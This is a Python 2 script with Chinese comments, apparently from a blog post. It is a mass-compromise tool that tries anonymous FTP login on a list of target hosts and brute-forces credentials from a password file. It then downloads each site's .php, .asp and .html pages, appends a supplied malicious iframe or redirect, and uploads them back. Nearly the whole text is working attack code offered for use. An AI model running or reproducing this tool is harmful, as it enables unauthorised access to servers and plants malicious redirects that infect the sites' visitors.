#!/usr/bin/python
#coding=utf-8
import ftplib
import optparse
import time
#实现攻击
def attack(username, password, tgtHost, redirect):
ftp = ftplib.FTP(tgtHost)
ftp.login(username, password)
defPages = returnDefault(ftp)
for defPage in defPages:
injectPage(ftp, defPage, redirect)
#验证匿名登陆
def anonLogin(hostname):
try:
ftp = ftplib.FTP(hostname)
ftp.login('anonymous', '123@123.com')
print '\n[*] ' + str(hostname) + ' FTP Anonymous Logon Succeded.'
ftp.quit()
return True
except Exception, e:
print '\n[-] ' + str(hostname) + ' FTP Anonymous Logon Failed.'
return False
#提取用户名密码并逐一尝试登陆
def bruteLogin(hostname, passwdFile):
pF = open(passwdFile, 'r')
for line in pF.readlines():
username = line.split(':')[0]
password = line.split(':')[1].strip('\r').strip('\n')
print '[+] Trying: ' + username + '/' + password
try:
ftp = ftplib.FTP(hostname)
ftp.login(username, password)
print '\n[*] ' + str(hostname) + ' FTP Logon Succeded: ' + username + '/' + password
ftp.quit()
return (username, password)
except Exception, e:
pass
print '\n[-] Could not brubrute force FTP credentials.'
return (None, None)
#列出指定搜索的文档
def returnDefault(ftp):
try:
#获取目录下的文件
dirList = ftp.nlst()
except:
dirList = []
print '[-] Could not list directory contents.'
print '[-] Skipping To Next Target.'
return
retList = []
for filename in dirList:
fn = filename.lower()
#设定文件搜索条件
if '.php' in fn or '.asp' in fn or '.htm' in fn or '.html' in fn:
print '[+] Found default page: ' + filename
retList.append(filename)
return retList
#下载-改写-插入-上传
def injectPage(ftp, page, redirect):
f = open(page + '.tmp', 'w')
#下载FTP文件
ftp.retrlines('RETR ' + page, f.write)
print '[+] Downloaded page: ' + page
#写入文件
f.write(redirect)
f.close()
print '[+] Injected Malicious IFrame on: ' + page
#上传目标文件
ftp.storlines('STOR ' + page, open(page + '.tmp'))
print '[+] Uploaded Injected Page: ' + page
def main():
#参数设置
parser = optparse.OptionParser('[*] Usage : ./massCompromise.py -H <target host[s]> -r <redirect page> -f <userpass file>')
parser.add_option('-H', dest = 'hosts', type = 'string', help = 'specift target host')
parser.add_option('-r', dest = 'redirect', type = 'string', help = 'specift redirect page')
parser.add_option('-f', dest = 'file', type = 'string', help = 'specify userpass file')
(options, args) = parser.parse_args()
#可以列出多个目标,用,分隔
hosts = str(options.hosts).split(',')
redirect = options.redirect
file = options.file
#判断主机或攻击代码是否存在
if hosts == None or redirect == None:
print parser.usage
exit(0)
#从列表中取对象,逐一验证
for host in hosts:
username = None
password = None
#验证是否可以匿名登陆
if anonLogin(host) == True:
username = 'anonymous'
password = '123@123.com'
print '[+] Using Anonymous Creds to attack'
attack(username, password, host, redirect)
#如果密码暴破文档存在
if file != None:
#验证用户名密码
(username, password) = bruteLogin(host, file)
#如果找到密码
if password != None:
print '[+] Using Cred: ' + username + '/' + password + ' to attack'
attack(username, password, host, redirect)
if __name__ == '__main__':
main()
整合攻击代码
最新推荐文章于 2024-06-28 09:33:44 发布